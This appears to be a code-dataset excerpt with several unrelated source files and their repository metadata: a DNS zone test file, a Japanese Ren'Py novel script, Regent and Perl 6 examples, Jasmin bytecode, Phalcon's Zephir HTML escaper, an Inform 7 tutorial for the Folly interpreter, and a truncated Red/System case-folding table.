A 127.0.0.1 AAAA ::1 www867 A 127.0.0.1 AAAA ::1 www868 A 127.0.0.1 AAAA ::1 www869 A 127.0.0.1 AAAA ::1 www870 A 127.0.0.1 AAAA ::1 www871 A 127.0.0.1 AAAA ::1 www872 A 127.0.0.1 AAAA ::1 www873 A 127.0.0.1 AAAA ::1 www874 A 127.0.0.1 AAAA ::1 www875 A 127.0.0.1 AAAA ::1 www876 A 127.0.0.1 AAAA ::1 www877 A 127.0.0.1 AAAA ::1 www878 A 127.0.0.1 AAAA ::1 www879 A 127.0.0.1 AAAA ::1 www880 A 127.0.0.1 AAAA ::1 www881 A 127.0.0.1 AAAA ::1 www882 A 127.0.0.1 AAAA ::1 www883 A 127.0.0.1 AAAA ::1 www884 A 127.0.0.1 AAAA ::1 www885 A 127.0.0.1 AAAA ::1 www886 A 127.0.0.1 AAAA ::1 www887 A 127.0.0.1 AAAA ::1 www888 A 127.0.0.1 AAAA ::1 www889 A 127.0.0.1 AAAA ::1 www890 A 127.0.0.1 AAAA ::1 www891 A 127.0.0.1 AAAA ::1 www892 A 127.0.0.1 AAAA ::1 www893 A 127.0.0.1 AAAA ::1 www894 A 127.0.0.1 AAAA ::1 www895 A 127.0.0.1 AAAA ::1 www896 A 127.0.0.1 AAAA ::1 www897 A 127.0.0.1 AAAA ::1 www898 A 127.0.0.1 AAAA ::1 www899 A 127.0.0.1 AAAA ::1 www900 A 127.0.0.1 AAAA ::1 www901 A 127.0.0.1 AAAA ::1 www902 A 127.0.0.1 AAAA ::1 www903 A 127.0.0.1 AAAA ::1 www904 A 127.0.0.1 AAAA ::1 www905 A 127.0.0.1 AAAA ::1 www906 A 127.0.0.1 AAAA ::1 www907 A 127.0.0.1 AAAA ::1 www908 A 127.0.0.1 AAAA ::1 www909 A 127.0.0.1 AAAA ::1 www910 A 127.0.0.1 AAAA ::1 www911 A 127.0.0.1 AAAA ::1 www912 A 127.0.0.1 AAAA ::1 www913 A 127.0.0.1 AAAA ::1 www914 A 127.0.0.1 AAAA ::1 www915 A 127.0.0.1 AAAA ::1 www916 A 127.0.0.1 AAAA ::1 www917 A 127.0.0.1 AAAA ::1 www918 A 127.0.0.1 AAAA ::1 www919 A 127.0.0.1 AAAA ::1 www920 A 127.0.0.1 AAAA ::1 www921 A 127.0.0.1 AAAA ::1 www922 A 127.0.0.1 AAAA ::1 www923 A 127.0.0.1 AAAA ::1 www924 A 127.0.0.1 AAAA ::1 www925 A 127.0.0.1 AAAA ::1 www926 A 127.0.0.1 AAAA ::1 www927 A 127.0.0.1 AAAA ::1 www928 A 127.0.0.1 AAAA ::1 www929 A 127.0.0.1 AAAA ::1 www930 A 127.0.0.1 AAAA ::1 www931 A 127.0.0.1 AAAA ::1 www932 A 127.0.0.1 AAAA ::1 www933 A 127.0.0.1 AAAA ::1 www934 A 127.0.0.1 AAAA ::1 www935 A 127.0.0.1 AAAA ::1 www936 A 127.0.0.1 AAAA ::1 www937 A 127.0.0.1 AAAA ::1 www938 A 127.0.0.1 AAAA ::1 www939 A 127.0.0.1 AAAA ::1 www940 A 127.0.0.1 AAAA ::1 www941 A 127.0.0.1 AAAA ::1 www942 A 127.0.0.1 AAAA ::1 www943 A 127.0.0.1 AAAA ::1 www944 A 127.0.0.1 AAAA ::1 www945 A 127.0.0.1 AAAA ::1 www946 A 127.0.0.1 AAAA ::1 www947 A 127.0.0.1 AAAA ::1 www948 A 127.0.0.1 AAAA ::1 www949 A 127.0.0.1 AAAA ::1 www950 A 127.0.0.1 AAAA ::1 www951 A 127.0.0.1 AAAA ::1 www952 A 127.0.0.1 AAAA ::1 www953 A 127.0.0.1 AAAA ::1 www954 A 127.0.0.1 AAAA ::1 www955 A 127.0.0.1 AAAA ::1 www956 A 127.0.0.1 AAAA ::1 www957 A 127.0.0.1 AAAA ::1 www958 A 127.0.0.1 AAAA ::1 www959 A 127.0.0.1 AAAA ::1 www960 A 127.0.0.1 AAAA ::1 www961 A 127.0.0.1 AAAA ::1 www962 A 127.0.0.1 AAAA ::1 www963 A 127.0.0.1 AAAA ::1 www964 A 127.0.0.1 AAAA ::1 www965 A 127.0.0.1 AAAA ::1 www966 A 127.0.0.1 AAAA ::1 www967 A 127.0.0.1 AAAA ::1 www968 A 127.0.0.1 AAAA ::1 www969 A 127.0.0.1 AAAA ::1 www970 A 127.0.0.1 AAAA ::1 www971 A 127.0.0.1 AAAA ::1 www972 A 127.0.0.1 AAAA ::1 www973 A 127.0.0.1 AAAA ::1 www974 A 127.0.0.1 AAAA ::1 www975 A 127.0.0.1 AAAA ::1 www976 A 127.0.0.1 AAAA ::1 www977 A 127.0.0.1 AAAA ::1 www978 A 127.0.0.1 AAAA ::1 www979 A 127.0.0.1 AAAA ::1 www980 A 127.0.0.1 AAAA ::1 www981 A 127.0.0.1 AAAA ::1 www982 A 127.0.0.1 AAAA ::1 www983 A 127.0.0.1 AAAA ::1 www984 A 127.0.0.1 AAAA ::1 www985 A 127.0.0.1 AAAA ::1 www986 A 127.0.0.1 AAAA ::1 www987 A 127.0.0.1 AAAA ::1 www988 A 127.0.0.1 AAAA ::1 www989 A 127.0.0.1 AAAA ::1 www990 A 127.0.0.1 AAAA ::1 www991 A 127.0.0.1 AAAA ::1 www992 A 127.0.0.1 AAAA ::1 www993 A 127.0.0.1 AAAA ::1 www994 A 127.0.0.1 AAAA ::1 www995 A 127.0.0.1 AAAA ::1 www996 A 127.0.0.1 AAAA ::1 www997 A 127.0.0.1 AAAA ::1 www998 A 127.0.0.1 AAAA ::1 www999 A 127.0.0.1 AAAA ::1 www1000 A 127.0.0.1 AAAA ::1
DNS Zone
4
ErwanDL/trust-dns
tests/compatibility-tests/tests/conf/bind-example.net.zone
[ "Apache-2.0", "MIT-0", "MIT" ]
label ccb0003: call gl(0,"bgcc0014") call vsp(1,0) call vsp(0,1) with wipeleft "いくつかの坂を越えて、商店街に。" play bgm "bgm/bgm016.ogg" "人影はない。" "田崎商店が見える。" 太一 "「……」" "ある種の期待とともに店内をのぞく。" "だが、そこに人の息吹は感じられない。" 太一 "「……不在か」" "田崎食料はここしばらく、不在続き。" "この地域密着型ショップの店主 田崎吾一郎氏(47歳独身)は無類の鉄道マニア。" "よくふらりと店をあけ、遠方の土地にローカル線の写真を撮りに行く。" "たまに写真を見せびらかされるが、ちっとも楽しくない。" "こっちは電車に抱く幻想など持ち合わせない今っ子なのだ。" "店は店主不在時もあいている。" "道楽的な無人商店だ。" "20代の頃JRへの就職に失敗し時代遅れのヤンキーへと失墜した氏だが(三十路までこの愚行は続いた)、ご両親の死後しばらくを経て、険の取れた豊かな顔つきへと変わっていった。" "遺産以外の何が、元暴走族の粗暴な鉄オタを善人に変えうるというのか。" "とにかく目先の現金にだけはありあまっている氏の店は、近隣の住人に対してはいくらでもツケてくれる希有な地元密着型店舗なのである。" "だから人がいないのは珍しいことではない。" "そういえば、ちょっと喉が渇いたな。" "店の奥に行って、緑茶のボトルを一本取ってくる。" "メモ帳を取り出し、ペンを走らせる。" "『9/7、大緑茶、130円……黒須太一』" "壁にぺたりこ。" "見ると、もう何枚ものメモが張ってある。" "『9/3、野菜ジュース健々GOGO、110円……山辺美希』" "『9/3、マグナムライチ、110円……桜庭浩』『ピリッと辛いです』" "『9/4、ペットボトル天然水、140円……宮澄見里』" "『9/5、野菜ジュース健々GOGO、110円……山辺美希』" "『9/5、キングドドリア、110円……桜庭浩』『あんまりおいしくなかったです』" "『9/6、野菜ジュース健々GOGO、110円……山辺美希』" "『9/6、胡椒警部、110円……佐倉霧』" "合宿中はいろいろ買いにきてたんだっけ。" 太一 "「……」" "合宿から帰ってくると、町から人はいなくなっていた。" "テレビ、ラジオ……あらゆるメディアが沈黙し、また電気や水道などの施設も止まっていた。" "皆、麻痺していた。" "棚上げするには重すぎる感情のやりとりが、直前にあったからだ。" "疲れて、話し合う気力もなく。" "結論を保留したまま、別れた。" "そして今日。" "新学期。" "俺は普通に登校しようとしていた。" pause (500.0/1000.0) pause (500.0/1000.0) stop bgm play se "se008" call gl(0,"bgcc0006") call vsp(0,1) with wipeleft "扉を開く。" "遮断されていた人の気配が溢れて、さらりと頬を撫でた。" "窓際の席。" play bgm "bgm/bgm013.ogg" call gl(0,"evcc0011") call vsp(0,1) "立て肘をついて座っている少女が、ちらと一瞥をよこす。" "美しい長髪。" "それは神経質なほどの手入れによって保たれている、危うい整然。" "近くで見るとわかる。" "鉄壁の管理は、ほつれ·枝毛の一本たりとも許していない。" "触れると軽く、指で梳けばさらさらと砂のように流れる。" "はじめて会ったとき、彼女は無敵の鎧をまとっていた。" "近寄りがたい雰囲気という、見えない甲冑。" "理由はいろいろあったのだろう。" "ここが群青学院であること。" "けたたましいクラスメイト。" "死人のようなクラスメイト。" "ただ自らの世界しか見ていない虚ろな少年少女たち。" "まともに会話が成立する者など、数えるほどしかいない。" "各所に立つ、感情を抱かない警備員たち。" "躁狂めいて戯画化された教室世界。" "屍の山に、ゼンマイ仕掛けの玩具を放り込んだが如く、悪辣な世界観。" "適応係数46、桐原冬子がその中で生きるには、残された54%を守るものが必要だった。" "他者を疎外することで、保たれる自意識。" "その意味で、入学当初における彼女の選択は正しかった。" "今の冬子は、当時の彼女と似ている。" "虚飾と、虚勢と、虚栄心。" "それが桐原冬子という人物の全てと言えた。" 太一 "「へえ、来てたんだ」" 冬子 "「……」" "視線が窓の外に投じられる。" "そらぞらしいほどのタイミングで。" menu: "無視する気まんまんだ。" "屋上に行く": $B=1 "冬子と話す": $B=2 return #
Ren'Py
3
fossabot/cross-channel_chinese-localization_project
AllPlatforms/scripts/ccb/ccb0003.rpy
[ "Apache-2.0" ]
-- Copyright 2021 Stanford University -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. import "regent" task f(i : int) var point = int1d(regentlib.c.legion_task_get_index_point(__task())) regentlib.assert(point == int1d(i), "test failed") end task main() for t = 0, 3 do __forbid(__index_launch) for i = 1, 2 do f(i) end var is = ispace(int1d, 1, 2) __forbid(__index_launch) for i in is do f(i) end end end regentlib.start(main)
Rouge
4
mmccarty/legion
language/tests/regent/run_pass/raw_task_point.rg
[ "Apache-2.0" ]
use v6; =begin pod =head1 TITLE triangle.p6 - Initialize GLUT and render a simple OpenGL animation =head1 SYNOPSIS $ cd rakudo-home $ export PERL6LIB=rakudo-home:parrot-home/runtime/parrot/library $ ./perl6 parrot-home/examples/opengl/triangle.p6 =head1 DESCRIPTION This simple example shows how to load the OpenGL/GLU/GLUT wrapper, create a small GLUT window and register the appropriate callbacks, and finally display a simple OpenGL animation until the user closes the window. It is a simple translation of F<triangle.pir> to Perl 6. To quit the example, press C<Q> or the C<ESCAPE> key, or close the window using your window manager (using the X in the corner of the window title bar, for example). To pause or restart the animation, press any other ASCII key. For a more complex and well-behaved example, try F<shapes.p6>. =end pod # None of these currently work; they all create an inescapable new lexical pad # require 'glutconst.p6'; # 'glutconst.p6'.evalfile; # eval open('glutconst.p6').slurp; constant GLUT_RGBA = 0x0000; constant GLUT_DOUBLE = 0x0002; constant GL_TRIANGLES = 0x0004; constant GL_DEPTH_BUFFER_BIT = 0x0100; constant GL_COLOR_BUFFER_BIT = 0x4000; use OpenGL:from<parrot>; use NCI::Utils:from<parrot>; our $rotating = 1; our $prev_time = time(); our $window; sub MAIN(*@ARGS is rw) { # Initialize GLUT @ARGS = call_toolkit_init(&glutInit, @ARGS, $*PROGRAM_NAME); # Set display mode glutInitDisplayMode(GLUT_DOUBLE +| GLUT_RGBA); # Create GLUT window $window = glutCreateWindow('Rotating Triangle NCI Test'); # Set up GLUT callbacks glutDisplayFunc( &draw ); glutIdleFunc( &idle ); glutKeyboardFunc( &keyboard ); # Enter the GLUT main loop glutMainLoop(); # Rakudo bug -- glutMainLoop() never returns, but Rakudo dies without this return; } sub draw { glClear(GL_COLOR_BUFFER_BIT +| GL_DEPTH_BUFFER_BIT); glBegin(GL_TRIANGLES); glColor3f(1, 0, 0); glVertex3f(-.5, -.5, 0); glColor3f(0, 1, 0); glVertex3f( .5, -.5, 0); glColor3f(0, 0, 1); glVertex3f(0 , .5, 0); glEnd(); glutSwapBuffers(); } sub idle { my $now = time(); my $dt = 360 * ($now - $prev_time); $prev_time = $now; if ($rotating) { glRotatef($dt, 0, 1, 0); glutPostRedisplay(); } } sub keyboard($key, $x, $y) { # For ESCAPE, 'Q', and 'q', exit program if ($key == 27 | 81 | 113) { glutDestroyWindow($window); } # For all other keys, just toggle rotation else { $rotating = !$rotating; } } # Local Variables: # mode: pir # fill-column: 100 # End: # vim: expandtab shiftwidth=4 ft=perl6:
Perl6
5
winnit-myself/Wifie
examples/opengl/triangle.p6
[ "Artistic-2.0" ]
{ metadata: { namespace: "HTMLTokenizer", }, data: [ { name: "--", Symbol: "dashDash", }, "doctype", { name: "[CDATA[", Symbol: "cdata", }, // The symbol "public" conflicts with the C++ keyword. { name: "public", Symbol: "publicString", }, "system", ], }
JSON5
3
zipated/src
third_party/blink/renderer/core/html/parser/html_tokenizer_names.json5
[ "BSD-3-Clause" ]
.bytecode 50.0 .class public com/googlecode/d2j/tools/jar/test/res/Res .super java/util/ArrayList .method public <init>()V aload 0 invokespecial java/util/ArrayList/<init>()V return .limit locals 1 .limit stack 1 .end method .method public static varargs main([Ljava/lang/String;)V getstatic java/lang/System/out Ljava/io/PrintStream; ldc "" invokestatic com/googlecode/d2j/tools/jar/test/res/Res/append_A001(Ljava/io/PrintStream;Ljava/lang/CharSequence;)Ljava/io/PrintStream; pop getstatic java/lang/System/out Ljava/io/PrintStream; ldc "test" invokestatic com/googlecode/d2j/tools/jar/test/WaveTest/println(Ljava/lang/Object;Ljava/lang/String;)Ljava/lang/Object; pop return .limit locals 1 .limit stack 2 .end method .method private static synthetic append_A001(Ljava/io/PrintStream;Ljava/lang/CharSequence;)Ljava/io/PrintStream; new d2j/gen/MI__000 dup aload 0 iconst_1 anewarray java/lang/Object dup iconst_0 aload 1 aastore iconst_0 invokespecial d2j/gen/MI__000/<init>(Ljava/lang/Object;[Ljava/lang/Object;I)V invokestatic com/googlecode/d2j/tools/jar/test/WaveTest/append(Lp;)Ljava/lang/Object; checkcast java/io/PrintStream areturn .limit locals 2 .limit stack 7 .end method .method public static append_CB002(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; aload 0 checkcast java/io/PrintStream aload 1 iconst_0 aaload checkcast java/lang/CharSequence invokevirtual java/io/PrintStream/append(Ljava/lang/CharSequence;)Ljava/io/PrintStream; areturn .limit locals 2 .limit stack 3 .end method .method public size()I aload 0 invokestatic com/googlecode/d2j/tools/jar/test/res/Res/size_A003(Ljava/util/ArrayList;)I ireturn .limit locals 1 .limit stack 1 .end method .method private static synthetic size_A003(Ljava/util/ArrayList;)I new d2j/gen/MI__000 dup aload 0 aconst_null iconst_1 invokespecial d2j/gen/MI__000/<init>(Ljava/lang/Object;[Ljava/lang/Object;I)V invokestatic com/googlecode/d2j/tools/jar/test/WaveTest/size(Lp;)Ljava/lang/Object; checkcast java/lang/Number invokevirtual java/lang/Number/intValue()I ireturn .limit locals 1 .limit stack 5 .end method .method public size_CB004([Ljava/lang/Object;)Ljava/lang/Object; aload 0 invokespecial java/util/ArrayList/size()I invokestatic java/lang/Integer/valueOf(I)Ljava/lang/Integer; areturn .limit locals 2 .limit stack 1 .end method .method public add(Ljava/lang/Object;)Z aload 0 aload 1 invokestatic com/googlecode/d2j/tools/jar/test/WaveTest/add(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; checkcast java/lang/Boolean invokevirtual java/lang/Boolean/booleanValue()Z ireturn .limit locals 2 .limit stack 2 .end method
Jasmin
1
Mrack/dex2jar
dex-tools/src/test/resources/weave/b-after.j
[ "Apache-2.0" ]
/** * This file is part of the Phalcon Framework. * * (c) Phalcon Team <team@phalcon.io> * * For the full copyright and license information, please view the LICENSE.txt * file that was distributed with this source code. */ namespace Phalcon; use Phalcon\Di\DiInterface; use Phalcon\Escaper\EscaperInterface; use Phalcon\Escaper\Exception; /** * Phalcon\Escaper * * Escapes different kinds of text securing them. By using this component you * may prevent XSS attacks. * * This component only works with UTF-8. The PREG extension needs to be compiled * with UTF-8 support. * *```php * $escaper = new \Phalcon\Escaper(); * * $escaped = $escaper->escapeCss("font-family: <Verdana>"); * * echo $escaped; // font\2D family\3A \20 \3C Verdana\3E *``` */ class Escaper implements EscaperInterface { /** * @var bool */ protected doubleEncode = true; /** * @var string */ protected encoding = "utf-8"; /** * @var int */ protected flags = 3; /** * Escapes a HTML attribute string */ public function attributes(string attribute = null) -> string { return htmlspecialchars( attribute, ENT_QUOTES, this->encoding, this->doubleEncode ); } /** * Escape CSS strings by replacing non-alphanumeric chars by their * hexadecimal escaped representation */ public function css(string input) -> string { /** * Normalize encoding to UTF-32 * Escape the string */ return phalcon_escape_css( this->normalizeEncoding(input) ); } /** * Detect the character encoding of a string to be handled by an encoder. * Special-handling for chr(172) and chr(128) to chr(159) which fail to be * detected by mb_detect_encoding() */ final public function detectEncoding(string str) -> string | null { var charset; /** * Check if charset is ASCII or ISO-8859-1 */ let charset = phalcon_is_basic_charset(str); if typeof charset == "string" { return charset; } /** * We require mbstring extension here */ if !function_exists("mb_detect_encoding") { return null; } /** * Strict encoding detection with fallback to non-strict detection. * Check encoding */ for charset in ["UTF-32", "UTF-8", "ISO-8859-1", "ASCII"] { if mb_detect_encoding(str, charset, true) { return charset; } } /** * Fallback to global detection */ return mb_detect_encoding(str); } /** * Escape CSS strings by replacing non-alphanumeric chars by their * hexadecimal escaped representation */ public function escapeCss(string css) -> string { return this->css(css); } /** * Escape JavaScript strings by replacing non-alphanumeric chars by their * hexadecimal escaped representation */ public function escapeJs(string js) -> string { return this->js(js); } /** * Escapes a HTML string. Internally uses htmlspecialchars */ public function escapeHtml(string text = null) -> string { return this->html(text); } /** * Escapes a HTML attribute string */ public function escapeHtmlAttr(string text = null) -> string { return this->attributes(text); } /** * Escapes a URL. Internally uses rawurlencode */ public function escapeUrl(string url) -> string { return this->url(url); } /** * Returns the internal encoding used by the escaper */ public function getEncoding() -> string { return this->encoding; } /** * Returns the current flags for htmlspecialchars */ public function getFlags() -> int { return this->flags; } /** * Escapes a HTML string. Internally uses htmlspecialchars */ public function html(string input = null) -> string { return htmlspecialchars( input, this->flags, this->encoding, this->doubleEncode ); } /** * Escape javascript strings by replacing non-alphanumeric chars by their * hexadecimal escaped representation */ public function js(string input) -> string { /** * Normalize encoding to UTF-32 * Escape the string */ return phalcon_escape_js( this->normalizeEncoding(input) ); } /** * Utility to normalize a string's encoding to UTF-32. */ final public function normalizeEncoding(string str) -> string { /** * mbstring is required here */ if unlikely !function_exists("mb_convert_encoding") { throw new Exception("Extension 'mbstring' is required"); } /** * Convert to UTF-32 (4 byte characters, regardless of actual number of * bytes in the character). */ return mb_convert_encoding( str, "UTF-32", this->detectEncoding(str) ); } /** * Sets the double_encode to be used by the escaper * *```php * $escaper->setDoubleEncode(false); *``` */ public function setDoubleEncode(bool doubleEncode) -> void { let this->doubleEncode = doubleEncode; } /** * Sets the encoding to be used by the escaper * *```php * $escaper->setEncoding("utf-8"); *``` */ public function setEncoding(string encoding) -> void { let this->encoding = encoding; } /** * Sets the HTML quoting type for htmlspecialchars * *```php * $escaper->setFlags(ENT_XHTML); *``` */ public function setFlags(int flags) -> <Escaper> { let this->flags = flags; return this; } /** * Sets the HTML quoting type for htmlspecialchars * *```php * $escaper->setHtmlQuoteType(ENT_XHTML); *``` */ public function setHtmlQuoteType(int quoteType) -> void { let this->flags = quoteType; } /** * Escapes a URL. Internally uses rawurlencode */ public function url(string url) -> string { return rawurlencode(url); } }
Zephir
5
stijn1989/cphalcon
phalcon/Escaper.zep
[ "BSD-3-Clause" ]
"Welcome to Folly" by "Ben Kirwin" The story headline is "An Interactive Tutorial". The release number is 1. The story description is "An introduction to Folly, the handwritten Z-machine for the reMarkable tablet." The story creation year is 2022. Include Basic Screen Effects by Emily Short. Include Basic Help Menu by Emily Short. [ Things to teach the user: - Swipe left and right to turn the page - Write on the line to provide inputs normally - Tap 'space' when the game says to press space or any key - Navigate menus - Open the keyboard - Save and restore ] When play begins: Say "[italic type]Welcome to Folly - an interactive fiction interpreter for the reMarkable tablet.[paragraph break]The Z-machine was designed by Infocom in the 1970s, designed specifically for interactive fiction games. Thousands of games have been released in this format, and the interpreters you need to play them have been written for almost every sort of computer... including the one in your hands now.[paragraph break]These games were designed to be played sitting at a computer and typing on a keyboard, but you'll be playing them by handwriting on a tablet. Even experienced interactive fiction players may need some help to get used to this! This tutorial is a simple game meant to introduce you to Folly's features, along with the basic mechanics of playing a game. Tutorial messages, like this one, are written in italics.[paragraph break]Instead of an infinite scroll of text, Folly's output is broken up into pages. The current page number is on the bottom, and the small > next to it means that there are more pages after the current one. Swipe right-to-left when you're ready to flip to the next page, or the other way to flip back.[roman type][paragraph break]" Table of Things to Do Status Introduction Instruction Congratulation Explained "Command Input" "In Folly, you give the game commands by handwriting them next to a '>' prompt, on a line like the one at the end of the text below. The game will respond within a second or so once you've lifted your pen away from the screen.[paragraph break]Folly understands most people's handwriting fairly well, but it's not perfect; make sure you print your instructions clearly in lowercase. (If you're really having trouble, tap the little keyboard icon next to the prompt to bring up an onscreen keyboard.) Let's start by examining that mysterious sign..." "Write 'examine sign' on the input line below." "Nice work! You'll notice that the prompt and your handwriting is still visible above, but the input line is gone. You can't go back and change your old commands, but it can be useful to go back and reread them to remind yourself of what you've already tried." false "Menus and Help" "Many interactive fiction games contain a help menu. Menus are currently a bit awkward in Folly, since they were designed for keyboard navigation; you'll need to use an onscreen keyboard for them. This game's help menu holds general tips for playing IF; you won't need them for this tutorial, but they're useful to know for other games." "Write 'help' at the prompt, then use the onscreen keyboard to navigate the help menu." "Congratulations... you've survived a menu! If you ever want to revisit the help information, just write 'help' at the prompt again." false "Saving" "Along with in-game commands like 'get' and 'look', interactive fictions also support meta-commands like 'save', 'restore', and 'quit'. You run these commands just like any other: by writing them next to the prompt. Folly has special support for saving and restoring the game, so let's try those out first." "Write 'save' at the prompt below." "Game saved! Folly records the contents of the status line along with the save, to help recognize it later on." false "Restoring" "We've saved the game, so let's try restoring it." "Write 'restore' at the prompt below, then select the game you saved earlier from the list." "Game restored!" false "Quitting" "The last important meta-command is 'quit', which exits the game and dumps you back to the main menu... useful if you'd like to play another game instead." "Write 'quit' at the prompt below." "That's it! If you're an experienced interactive fiction player, you've learned everything you need to know. If you're still learning, you may want to try a game like Emily Short's [bold type]Bronze[roman type][italic type] to learn more of the usual commands and how the world works." false N is a number that varies. N is 1. Before reading a command: If N is greater than the number of rows in the Table of Things to Do, continue the action; Choose row N in the Table of Things to Do; now the right hand status line is "[Status entry]"; If Explained entry is false, say "[italic type][Introduction entry][roman type][paragraph break]"; Now Explained entry is true; Say "[italic type][Instruction entry][roman type]". To say status-entry: choose row N in the Table of Things to Do; say "[Status entry]". To advance the tutorial: if N is greater than the number of rows in the Table of Things to Do, continue the action; choose row N in the Table of Things to Do; Say "[italic type][Congratulation entry][roman type][paragraph break]"; Increase N by 1; if N is at most the number of rows in the Table of Things to Do: choose row N in the Table of Things to Do; if N is greater than 2, say "The sign once again flashes, contorts, and settles on '[Status entry].'" The help request rule is not listed in any rulebook. Carry out asking for help: now the current menu is the Table of Instruction Options; carry out the displaying activity; clear the screen; if N is 2, advance the tutorial; stop the action. After printing a parser error: Say "[line break][italic type]Your command was recognized as [roman type][bold type][the player's command][roman type][italic type]. If that's not what you wrote, that means Folly[italic type] couldn't understand your handwriting properly. Make sure you're writing your command clearly on the line; printed, unabbreviated, lowercase commands tend to work best. You could also enter the command using the on-screen keyboard... just tap the keyboard icon in the margin, type your command on the keyboard that appears, and hit enter.[paragraph break]". The description of the player is "Bright-eyed and eager to learn." Tutorial room is a room. "You find yourself in a vast, featureless, white expanse, stretching as far as you can see in every direction." The neon sign is here. "Well, not entirely featureless... a neon sign lies just ahead, blinking against the void." The description is "An ordinary neon sign, red, slowly blinking on and off, and unconnected to any power source you can see. It currently reads '[status-entry].'" The sign is fixed in place. The sign is an enterable supporter. Instead of tasting the sign, say "Delicious but unsatisfying." Instead of going a direction (called way): say "You walk [way] for a bit, but seem to end up right where you started." After examining the sign for the first time: Advance the tutorial; say "As you inspect the sign, the text briefly flashes green, then contorts itself into a new phrase: 'Pressing a Key'.[paragraph break][italic type]Aside from normal, handwritten commands, games may also wait for a single keypress at a time. This is mostly used to ask the user to 'press any key' to pace out long sections of text, like it is just below. In that case, you can just hit the 'space' key that will appear in the middle of your screen. (Otherwise, tap the keyboard icon in the margin to open a full keyboard.)[roman type][paragraph break][bracket]Press any key to continue.[close bracket]"; now the right hand status line is "Pressing a Key"; redraw status line; wait for any key; say "[paragraph break]The sign blinks green and twists again, now reading '[status-entry].'[paragraph break]". Report saving the game: [This triggers on save-failed, which I would fix if saves didn't always succeed on the device.] if N is 3, advance the tutorial; continue the action. The restore the game rule response (B) is "[post-restore]" To say post-restore: if N is 3, now N is 4; if N is 4: advance the tutorial; otherwise: say "Ok." Carry out quitting the game: if N is 5, advance the tutorial; continue the action. [Try and get 'hop' out of the dictionary.] Understand the command "hop" as something new.
Inform 7
5
bkirwi/folly
Tutorial.inform/Source/story.ni
[ "MIT" ]
Hello, ${user.name}. The password for your CUBA Application account has been reset by administrator. Please login with the following temporary password: ${password} and immediately create a new one for the further work. Thank you, CUBA Team
Groovy Server Pages
0
mitring/cuba
modules/core/src/com/haulmont/cuba/security/app/email/reset-password-body.gsp
[ "Apache-2.0" ]
Red/System [ Title: "case folding table file auto generated from rust" Author: "bitbegin" File: %case-folding-table.reds Usage: comment { run %utils/generate-unicode-table.red to produce this file } Tabs: 4 License: { Distributed under the Boost Software License, Version 1.0. See https://github.com/red/red/blob/master/BSL-License.txt } ] ;-- Unicode version: 11.0.0 to-uppercase-table: [ 0061h 0041h 0062h 0042h 0063h 0043h 0064h 0044h 0065h 0045h 0066h 0046h 0067h 0047h 0068h 0048h 0069h 0049h 006Ah 004Ah 006Bh 004Bh 006Ch 004Ch 006Dh 004Dh 006Eh 004Eh 006Fh 004Fh 0070h 0050h 0071h 0051h 0072h 0052h 0073h 0053h 0074h 0054h 0075h 0055h 0076h 0056h 0077h 0057h 0078h 0058h 0079h 0059h 007Ah 005Ah 00B5h 039Ch 00DFh 0053h 00E0h 00C0h 00E1h 00C1h 00E2h 00C2h 00E3h 00C3h 00E4h 00C4h 00E5h 00C5h 00E6h 00C6h 00E7h 00C7h 00E8h 00C8h 00E9h 00C9h 00EAh 00CAh 00EBh 00CBh 00ECh 00CCh 00EDh 00CDh 00EEh 00CEh 00EFh 00CFh 00F0h 00D0h 00F1h 00D1h 00F2h 00D2h 00F3h 00D3h 00F4h 00D4h 00F5h 00D5h 00F6h 00D6h 00F8h 00D8h 00F9h 00D9h 00FAh 00DAh 00FBh 00DBh 00FCh 00DCh 00FDh 00DDh 00FEh 00DEh 00FFh 0178h 0101h 0100h 0103h 0102h 0105h 0104h 0107h 0106h 0109h 0108h 010Bh 010Ah 010Dh 010Ch 010Fh 010Eh 0111h 0110h 0113h 0112h 0115h 0114h 0117h 0116h 0119h 0118h 011Bh 011Ah 011Dh 011Ch 011Fh 011Eh 0121h 0120h 0123h 0122h 0125h 0124h 0127h 0126h 0129h 0128h 012Bh 012Ah 012Dh 012Ch 012Fh 012Eh 0131h 0049h 0133h 0132h 0135h 0134h 0137h 0136h 013Ah 0139h 013Ch 013Bh 013Eh 013Dh 0140h 013Fh 0142h 0141h 0144h 0143h 0146h 0145h 0148h 0147h 0149h 02BCh 014Bh 014Ah 014Dh 014Ch 014Fh 014Eh 0151h 0150h 0153h 0152h 0155h 0154h 0157h 0156h 0159h 0158h 015Bh 015Ah 015Dh 015Ch 015Fh 015Eh 0161h 0160h 0163h 0162h 0165h 0164h 0167h 0166h 0169h 0168h 016Bh 016Ah 016Dh 016Ch 016Fh 016Eh 0171h 0170h 0173h 0172h 0175h 0174h 0177h 0176h 017Ah 0179h 017Ch 017Bh 017Eh 017Dh 017Fh 0053h 0180h 0243h 0183h 0182h 0185h 0184h 0188h 0187h 018Ch 018Bh 0192h 0191h 0195h 01F6h 0199h 0198h 019Ah 023Dh 019Eh 0220h 01A1h 01A0h 01A3h 01A2h 01A5h 01A4h 01A8h 01A7h 01ADh 01ACh 01B0h 01AFh 01B4h 01B3h 01B6h 01B5h 01B9h 01B8h 01BDh 01BCh 01BFh 01F7h 01C5h 01C4h 01C6h 01C4h 01C8h 01C7h 01C9h 01C7h 01CBh 01CAh 01CCh 01CAh 01CEh 01CDh 01D0h 01CFh 01D2h 01D1h 01D4h 01D3h 01D6h 01D5h 01D8h 01D7h 01DAh 01D9h 01DCh 01DBh 01DDh 018Eh 01DFh 01DEh 01E1h 01E0h 01E3h 01E2h 01E5h 01E4h 01E7h 01E6h 01E9h 01E8h 01EBh 01EAh 01EDh 01ECh 01EFh 01EEh 01F0h 004Ah 01F2h 01F1h 01F3h 01F1h 01F5h 01F4h 01F9h 01F8h 01FBh 01FAh 01FDh 01FCh 01FFh 01FEh 0201h 0200h 0203h 0202h 0205h 0204h 0207h 0206h 0209h 0208h 020Bh 020Ah 020Dh 020Ch 020Fh 020Eh 0211h 0210h 0213h 0212h 0215h 0214h 0217h 0216h 0219h 0218h 021Bh 021Ah 021Dh 021Ch 021Fh 021Eh 0223h 0222h 0225h 0224h 0227h 0226h 0229h 0228h 022Bh 022Ah 022Dh 